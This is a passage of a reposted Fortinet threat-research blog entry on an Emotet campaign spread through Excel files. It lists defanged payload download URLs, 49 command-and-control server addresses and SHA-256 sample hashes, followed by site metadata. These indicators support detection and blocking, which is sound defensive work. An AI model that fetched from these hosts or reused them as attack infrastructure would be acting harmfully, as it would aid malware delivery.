&quot;hxxp[:]\/\/robertflood[.]us\/eln-images\/DGI2YOkSc99XPO\/&quot;<br \/> &quot;hxxp[:]\/\/mpmcomputing[.]com\/fonts\/fJJrjqpIY3Bt3Q\/&quot;<br \/> &quot;hxxp[:]\/\/dadsgetinthegame[.]com\/eln-images\/tAAUG\/&quot;<br \/> &quot;hxxp[:]\/\/smbservices[.]net\/cgi\/JO01ckuwd\/&quot;<br \/> &quot;hxxp[:]\/\/stkpointers[.]com\/eln-images\/D\/&quot;<br \/> &quot;hxxp[:]\/\/rosewoodcraft[.]com\/Merchant2\/5[.]00\/PGqX\/&quot; <\/p>\n<p>\u00a0<\/p>\n<h4><b>C2 Server List in this Variant: (49 in total)<\/b><\/h4>\n<p>185[.]248[.]140[.]40:443<br \/> 8[.]9 [.]11 [.]48:443<br \/> 200[.]17 [.]134 [.]35:7080<br \/> 207[.]38 [.]84 [.]195:8080<br \/> 79[.]172 [.]212 [.]216:8080<br \/> 45[.]176 [.]232 [.]124:443<br \/> 45[.]118 [.]135 [.]203:7080<br \/> 162[.]243 [.]175 [.]63:443<br \/> 110[.]232[.]117[.]186:8080<br \/> 103[.]75[.]201[.]4:443<br \/> 195[.]154[.]133[.]20:443<br \/> 160[.]16[.]102[.]168:80<br \/> 164[.]68[.]99[.]3:8080<br \/> 131[.]100[.]24[.]231:80<br \/> 216[.]158[.]226[.]206:443<br \/> 159[.]89[.]230[.]105:443<br \/> 178[.]79[.]147[.]66:8080<br \/> 178[.]128[.]83[.]165:80<br \/> 212[.]237[.]5[.]209:443<br \/> 82[.]165[.]152[.]127:8080<br \/> 50[.]116[.]54[.]215:443<br \/> 58[.]227[.]42[.]236:80<br \/> 119[.]235[.]255[.]201:8080<br \/> 144[.]76[.]186[.]49:8080<br \/> 138[.]185[.]72[.]26:8080<br \/> 162[.]214[.]50[.]39:7080<br \/> 81[.]0[.]236[.]90:443<br \/> 176[.]104[.]106[.]96:8080<br \/> 144[.]76[.]186[.]55:7080<br \/> 129[.]232[.]188[.]93:443<br \/> 212[.]24[.]98[.]99:8080<br \/> 203[.]114[.]109[.]124:443<br \/> 103[.]75[.]201[.]2:443<br \/> 173[.]212[.]193[.]249:8080<br \/> 41[.]76[.]108[.]46:8080<br \/> 45[.]118[.]115[.]99:8080<br \/> 158[.]69[.]222[.]101:443<br \/> 107[.]182[.]225[.]142:8080<br \/> 212[.]237[.]17[.]99:8080<br \/> 212[.]237[.]56[.]116:7080<br \/> 159[.]8[.]59[.]82:8080<br \/> 46[.]55[.]222[.]11:443<br \/> 104[.]251[.]214[.]46:8080<br \/> 31[.]24[.]158[.]56:8080<br \/> 153[.]126[.]203[.]229:8080<br \/> 51[.]254[.]140[.]238:7080<br \/> 185[.]157[.]82[.]211:8080<br \/> 217[.]182[.]143[.]207:443<br \/> 45[.]142[.]114[.]231:8080 <\/p>\n<p>\u00a0<\/p>\n<h4><b>Sample SHA-256 Involved in the Campaign:<\/b><\/h4>\n<p>[Excel files Captured]<\/p>\n<p>25271BB2C848A32229EE7D39162E32F5F74580E43F5E24A93E6057F7D15524F0<\/p>\n<p>C176C2B0336EA70C0D875F5C79D00771D59891560283364A81B2EDE495CDE62F<\/p>\n<p>9C62600A0885E39BD39748150B9B64155C9EA2DBBCDD43241EB24C8E098DE782<\/p>\n<p>36C2119C68B3C79B58417CADEA3547F8BBECD2DF02FEB5F04EE798DFA621B66D<\/p>\n<p>B380DFC348541691E4084689405D8ACFAEAFDDD92EFF95566AFF2412F620E2DC<\/p>\n<p>68AA775EC46C8B0911542E471F9A7F39D538001BD8552898416310436F58B95A<\/p>\n<p>B14AB6A611A93B25DA2815D2071AA5B76085414BF6AD32432FC0809B3610DB05<\/p>\n<p>81E9D87903290E4A525BEB865F5CCCCA9838BDD51238DC4FD0B9AE623BF609BB<\/p>\n<p>B019A867D167B6088EA18B3BD2F1A67706505AACC9542C4017E757F0381B3F0A<\/p>\n<p>F4626135C820C4784E1452E81FE25D291EA3A6326E906A2E15AE960EEA3276E4<\/p>\n<p>[puihoud.dll (the downloaded Emotet)]<\/p>\n<p>A7C6ABBC3241B6CFCFA27158E80BD50D3C9F1AE97E86481CCABD5B2337670690<\/p>\n<p><i>Learn more about Fortinet\u2019s <a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs\">FortiGuard Labs<\/a> threat research and intelligence organization and the FortiGuard Security Subscriptions and Services <a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles\">portfolio<\/a>.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qbkzwxxbiv83f0ol5a2d-holder\"><\/div>\n<\/div><\/div>\n<\/p><\/div>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/ms-office-files-involved-in-emotet-trojan-campaign-pt-one\/_jcr_content\/root\/responsivegrid\/image.img.png\/1646637764539\/img1.png\"\/><br \/>FortiGuard Labs discovered more than 500 Microsoft Excel files involved in a campaign to deliver a fresh Emotet Trojan variant. Read to learn more how to avoid this lure.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-18440","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/18440","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=18440"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/18440\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=18440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=18440"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=18440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}